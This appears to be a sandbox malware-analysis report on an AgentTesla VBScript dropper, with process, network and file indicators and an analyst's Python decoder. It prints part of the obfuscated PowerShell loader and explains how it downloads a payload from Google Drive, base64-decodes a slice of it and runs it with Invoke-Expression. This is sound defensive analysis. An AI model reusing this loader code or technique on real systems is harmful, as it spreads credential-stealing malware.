Analysis Overview
SHA256
9aa64f43d090ff657848da74a0c2ea1f3211fa1d88ac3fa603e65d724360a957
Threat Level: Known bad
The file STS_Bunker_00617.vbs was found to be: Known bad.
Malicious Activity Summary
AgentTesla
Blocklisted process makes network request
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Command and Scripting Interpreter: PowerShell
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-18 09:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-18 09:36
Reported
2024-06-18 09:38
Platform
win7-20240611-en
Max time kernel
147s
Max time network
139s
Command Line
Signatures
AgentTesla
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2756 set thread context of 596 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp |
| GB | 142.250.187.238:443 | drive.google.com | tcp |
| GB | 172.217.169.33:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:443 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Elysee.txt
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZOG5NM3CAAAEVL24Q1J8.temp
C:\Users\Admin\AppData\Roaming\Cystenchyme.aan
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-18 09:36
Reported
2024-06-18 09:38
Platform
win10v2004-20240508-en
Max time kernel
142s
Max time network
147s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1996 wrote to memory of 4408 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1996 wrote to memory of 4408 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4408 wrote to memory of 4396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
| PID 4408 wrote to memory of 4396 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\cmd.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\STS_Bunker_00617.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
UpturniTagdrypnSprgepae Korsikt Liste,tManualae fgretr Necropn Nonexte TongfisStran i.Udplukkc edpanboPukishnuWago.ern OrganitProg os ') ;$Hovedindgange=$Spejlkabinetternes[$Brancherne];}$Horsiness=315407;$Gaullists=29994;Alcaldes (gigged 'Dazzlin$Skud idgQuestiol Gryde,o Tyvek.bRomanilaBetalinlHumoris:Sedu,itBPremiereJugulard Remol oI.dlyseeAfgassem billotmNokkerteVulca is Dru.he Usleben=Reinars SuperaG St vnieBogs.avtResugg,-SnklodmCStaalvaoDy,efornFriherrt KejsereLon heanPapmlketAdminis Minefie$ EloqueR VandtioRessortu MundhegHjl.efihCa,orizhHemihedotriathluDirektos FjernveopflgnisHyrdebr ');Alcaldes (gigged ' A.jung$Bra,derg edenaglQuizzicoParti,lb KommeraSub roclKildesk:Neu ochl UnactpgUberygttTopsejlrChar lyeu,prosc L,tosol= Avantg Pa.sers[PlagiotSFo djelyBreib.ksReplenitlsgaaeneHolde im Tallin.F.edreuCUndervio MonoounMentionviteaceaeIndtastrFiltrattShahzad]Sprayda:Sigmoid:B.ttedeFCarabinrSkidtero,malgammUndescrBBoligpoaVolontrsAntis oe Hamito6Lionhoo4Das.tbuSFarvebatIndkaldrPigtraaiLutidinnwendykegThunder(Bastard$Pa,tomiBCharadee UheldidOfficieoElinguaeF.rretnm AfsvammBarrac e grnskisEfterk,)Statsho ');Alcaldes (gigged 'Museurt$Iltelegg Postcol,kridteoNonpassbLettilgaMaskottlf,stela:MetalizdBeflattiHumaneimBarbareiS.fetyanS oliatu Oestrat Bab lliHoresrev.onsensiFabrikaz Lo.snieUnhothys Fisker Tilsted= Skippe das rti[ResponsSDrejerey,dminissPl.teryt TillideUbeskytmGamene..S.ndhedTTalvrdieInd ragxforulemt,llotro.aendr fEMicroscnCat dvacRepl kkoBepraykd,ataniciPhenoplnBrakerog Pen,ui]Sandara: Regneb:NavigatAFarmakoSLunte aCSiru,shIneins,pIFedeka .DiacoelGregisteeHenvej.tStudielS llianctMacrotor DedoloiSilde.enAabenragC,ckshu(.rythem$Bagklogl R.ngbig,umultetVentricr IndlaeeVgenssc) Outlop ');Alcaldes (gigged 'P,ecere$Git esvgquasijulKonsuleoLang urb irkulra SammenlIkldtca:R,seredHShrewdya ExplornKaritasdBastku,s,iltypeo Kn.bbem HovedveAfs emmnHumanizeBobsldesBedragesBrudebu=Repenni$ CentradSpottiniAnarkosmLasso.ui schrodn AfhjlpuFlamme 
tSystemviW,ttishvFortovsiNat naezEuklidseIlkaphosNeutron. UdnyttsUlyksaluDrukmaabTand,ursFolkevatGiftstorRetversi manuranGlyco.igSkraast(M,dsige$OmhandlHCutes.koKo,tunnrHaarbrss Rosa.eiIl.ustrn.akenere Rinsu.sBit oensOutthro,Subvic $DagsproGMutabelaEne.ralu BlodtrlRetmssilDeterm,i Begonis Knowl,tSkf,nins olivil)Goads e ');Alcaldes $Handsomeness;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cystenchyme.aan && echo t"
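Every string the PowerShell stage uses is passed through the `gigged` function defined at the start of the command line above. That function assembles the method name `Substring` from `'S'+'ubst'+'ring'` and then copies one character out of every eight from its argument (index 7, 15, 23, ... while the index stays below `Length-1`), so each plaintext character is preceded by seven junk characters and the final 8-character chunk is a terminator that is never emitted. The Python helper below is an analyst's decoder added to this report; it is not code from the sample or from the sandbox. It ports the routine, pulls every `gigged '...'` literal out of a captured command line with a regular expression, and flags literals whose length is not a multiple of 8. The excerpt it runs on is constructed from four literals copied from the command line above; the third decodes to exactly the `cmd.exe` command line shown for the child process, which is how the script learns its drop path under `%appdata%`. Note that the rendered page has collapsed runs of spaces inside some of the longer literals (the User-Agent string, for one), so run the decoder against the raw command line exported from the sandbox rather than against text copied from this page.

```python
"""Decoder for the string obfuscation in the PowerShell stage of STS_Bunker_00617.vbs.

The captured command line defines a function (named `gigged` in this build) that
rebuilds the method name "Substring" from 'S' + 'ubst' + 'ring' and then walks
its argument with a stride of 8, taking the character at index 7, 15, 23, ...
and stopping before index Length-1.  Every plaintext character is therefore
preceded by seven junk characters, and the last 8-character chunk is a
terminator that never reaches the output.

Added analysis helper; not code from the sample or the sandbox.
"""
from __future__ import annotations

import re

FIRST = 7        # For ($Subarachnoidean = 7; ...)
STRIDE = 8       # $Subarachnoidean += 8
TAIL_DROP = 1    # $Hejsevrkets = $Gladden.Length - $Scrotums, with $Scrotums = 1


def gigged(blob: str) -> str:
    """Python port of the sample's decoder.

    PowerShell equivalent:
        for ($i = 7; $i -lt $blob.Length - 1; $i += 8) { $out += $blob.Substring($i, 1) }
    """
    limit = len(blob) - TAIL_DROP
    return "".join(blob[i] for i in range(FIRST, limit, STRIDE))


def is_aligned(blob: str) -> bool:
    """True when the literal has the expected shape: 8 characters per plaintext
    character plus an 8-character terminator.  A copy that lost a space (as an
    HTML rendering does when it collapses runs of whitespace) loses this
    property and decodes to garbage from that point on, so check it before
    trusting the output."""
    return len(blob) % STRIDE == 0


def decode_command_line(cmdline: str, func_name: str = "gigged") -> list[tuple[str, str, bool]]:
    """Find every `<func_name> '...'` literal in a captured command line and
    return (encoded, decoded, aligned) triples in order of appearance.  The
    decoder's name is a parameter because it changes between builds."""
    pattern = re.compile(re.escape(func_name) + r"\s+'([^']*)'")
    return [(enc, gigged(enc), is_aligned(enc)) for enc in pattern.findall(cmdline)]


# Four literals copied from the captured command line, stitched into an
# abbreviated excerpt (constructed test input; the real command line is far longer).
SAMPLE_CMDLINE = (
    r"$Afkortersav=gigged 'UnproviiLa inioeLystyacxPrecalc ';"
    r"$Returgodset=gigged 'SandsynUTamsvinsMyoprote Spiller Udspio-I.rksatAPlayaedgVilj kreGemmatinRe eceitProtohe ';"
    r"$Krigssituationens = gigged ' tteaareDeclinecDeciduihNymph,noBilleds Camorri%VerrucuaSkurepupSolda,ep"
    r"TalarendMaitresaStandarttitu,eraEjendom% Lycop \FinansiCGenop oy LampwosFolkerotPonziteeNaumac n"
    r"ProgramcReallnshAflusniyMiekelimW andote stoc r.Cytostsa ForberaHallucinpatriar Uddykni&Pry.end&"
    r" Ko.nek PuslingeMaremmacLekane hTyktarmo galiva Sadleplt.kovbyg ';"
    r"Alcaldes (gigged 'BatrachSShampontProgramabiklangr.etamertForsorg-DictyosSGrosgralPrjudiceSupersaeSt.machpMucigen Teddedg4Precon, ');"
)


def decode_sample() -> list[str]:
    """Decode the embedded excerpt and return the plaintext strings in order."""
    return [plain for _, plain, _ in decode_command_line(SAMPLE_CMDLINE)]


if __name__ == "__main__":
    for enc, plain, ok in decode_command_line(SAMPLE_CMDLINE):
        flag = "" if ok else "  [length not a multiple of 8: this copy is probably damaged]"
        print(f"{plain!r}{flag}")
```

Decoding the remaining literals the same way gives the loader's logic: `iex` is bound to `$Afkortersav` so that `Alcaldes` is an Invoke-Expression wrapper; a `New-Object System.Net.WebClient` is created (the second echo line, `t`, supplies the final letter of the class name); a spoofed Firefox `User-Agent` header is set; `DownloadFile` fetches a `https://drive.google.com/uc?export=download&id=...` URL, which is the drive.google.com traffic in the Network table; a `Test-Path` / `Start-Sleep 4` loop waits for the file at the `%appdata%\Cystenchyme.aan` path returned by the `cmd.exe` child; and the file is then read with `Get-Content`, run through `[System.Convert]::FromBase64String` and `[System.Text.Encoding]::ASCII.GetString`, sliced with `.substring($Horsiness,$Gaullists)` (offset 315407 and length 29994 are left in cleartext in the command line) and handed to `iex`. The downloaded blob is therefore larger than the payload it carries, and the slice parameters are the first thing to pull out when carving the next stage from the dropped file.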
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\Elysee.txt
| MD5 | d91ce4da3b1a3c26df2a00c44c53bbe8 |
| SHA1 | dc2a78ace203c8f7908f80f6b4fb9f47cc174d30 |
| SHA256 | 28aea483fa1a2e3c89e58b111b01dd34b52fec05e0792b757559b1de466f3eef |
| SHA512 | cc9658970733f0896884d10887a9d836ed7a14d864e11dc27c680e88add5334336c511cda74e6a60ba3753ff9cb831e3f9cf545991b69b2c47b5485c2dada04f |
C:\Users\Admin\AppData\Local\Temp\Elysee.txt
| MD5 | 156d56579b5db937b0907bdec53b1200 |
| SHA1 | 91ac0a4b3e61d03ecd75d56d61cbb5d865513aac |
| SHA256 | ebfebe0e9db1e24b69cb3e25652b7b094c0469b49925a48666a67619d63cc544 |
| SHA512 | 6ab930b6d545593fe57ffe8097f2066af9eee4b7afa6f794da0f79dfd67cd468c31806858d39bbe0491a7b8cf47120873648e211c54c07159a366443fad05a94 |
memory/4408-363-0x00007FF947473000-0x00007FF947475000-memory.dmp
memory/4408-364-0x00000207433B0000-0x00000207433D2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_14l3cqvn.2i1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4408-374-0x00007FF947470000-0x00007FF947F31000-memory.dmp
memory/4408-375-0x00007FF947470000-0x00007FF947F31000-memory.dmp
memory/4408-376-0x00007FF947470000-0x00007FF947F31000-memory.dmp
memory/4408-377-0x00007FF947473000-0x00007FF947475000-memory.dmp
memory/4408-378-0x00007FF947470000-0x00007FF947F31000-memory.dmp
memory/4408-379-0x00007FF947470000-0x00007FF947F31000-memory.dmp